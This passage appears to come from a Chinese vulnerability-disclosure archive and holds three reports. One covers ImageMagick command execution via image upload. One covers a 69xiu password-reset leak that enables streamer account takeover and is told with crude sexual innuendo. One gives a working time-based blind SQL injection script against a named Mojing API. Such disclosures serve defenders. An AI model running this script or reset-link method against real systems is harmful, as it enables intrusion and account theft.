漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：命令执行。详细说明：imagemagic存在命令执行漏洞。发布商品，上传图片。漏洞证明：存在命令执行漏洞。直接反弹shell 修复方案：禁用imagemagic版权声明：转载请注明来源 D＆G@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-05 21:58厂商回复：感谢反馈最新状态：暂无

漏洞详情披露状态： 2016-06-06： 细节已通知厂商并且等待厂商处理中2016-06-07： 厂商已经确认，细节仅向厂商公开2016-06-07： 厂商已经修复漏洞并主动公开，细节向公众公开简要描述：在她直播的时候可以上了她 的 账号！详细说明：http://www.69xiu.com/rank拿主站一个正在直播的女主播演示一下进入直播页面可以看到妹子正在卖力的直播中，个人页面存在信息泄露，可获取到主播的邮箱地址email":"[email protected]/* */密码找回的功能也存在信息泄露，可利用邮箱重置密码（为了不影响厂商业务，犹豫了一下还是拿我自己的演示吧）漏洞证明：http://www.69xiu.com/my/checkemail/findpwd/输入邮箱找回密码可以看到只要知道code就能构造重置链接response这里又泄露了当然 女主播的也一样is_findpwd_email=a:4:{s:8:"sendtime";i:1464837456;s:6:"verify";s:32:"9d591fd9e63ce54529f589c27c4e4357";s:5:"email";s:17:"[email protected]/* */";s:6:"mobile";s:0:"";};http://www.69xiu.com/my/checkemail/isfindpwd/?code=9d591fd9e63ce54529f589c27c4e4357所以，在她直播的时候可以上了她 的 账号就不进一步演示了。。。还有好多女主播，列举几个code 区域MPT.Config("objRid", 71094697); MPT.Config("objArtist", {"baseInfo":{"uid":"19971567","nickname":"\u51ef\u6492\u5927\u5e1d111","sex":"2","email":"[email protected]/* */MPT.Config("objRid", 71096441);MPT.Config("objArtist", {"baseInfo":{"uid":"19972437","nickname":"AK\u4e36 \u7cd6\u679c","sex":"2","email":"[email protected]/* */"MPT.Config("objRid", 71074401);MPT.Config("objArtist", {"baseInfo":{"uid":"19961505","nickname":"\u70ed\u821e\u8587\u513f\u65b0\u4eba\u6c42","sex":"2","email":"[email protected]/* */" 修复方案：email/code别返回版权声明：转载请注明来源 getshell1993@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：18确认时间：2016-06-07 15:12厂商回复：漏洞已修复，高兴您对69秀的关注！最新状态：2016-06-07：漏洞已修复,非常感谢！

漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-04： 厂商已经确认，细节仅向厂商公开2016-05-14： 细节向核心白帽子及相关领域专家公开2016-05-24： 细节向普通白帽子公开2016-06-03： 细节向实习白帽子公开2016-06-18： 细节向公众公开简要描述：暴风魔镜某接口SQL注入(附验证脚本)详细说明： code 区域http://mj.cms.mojing.cn/api/v1/vr_market/source_list.php?source_type=2&category_id={catid}&version=20151016其中category_id存在注入 漏洞证明：[Done] MySQL user is [email protected]/* */%code 区域#encoding=utf-8 import httplib import time import string import sys import random import urllib headers = {} payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime()) user = '' for i in range(1, 24): for payload in payloads: try: s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload)) s = "aaa'XOR(if(%s,sleep(5),0))OR'bbb" % s conn = httplib.HTTPConnection('mj.cms.mojing.cn', timeout=3) conn.request(method='GET',url="/api/v1/vr_market/source_list.php?source_type=2&category_id=%s" % urllib.quote(s)) conn.getresponse() conn.close() print '.', except: user += payload print '\n[in progress]', user, time.sleep(5.0) break print '\n[Done] MySQL user is %s' % user修复方案：参数过滤版权声明：转载请注明来源 fuckadmin@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-05-04 19:26厂商回复：感谢您提交的漏洞，我们会尽快修复。最新状态：暂无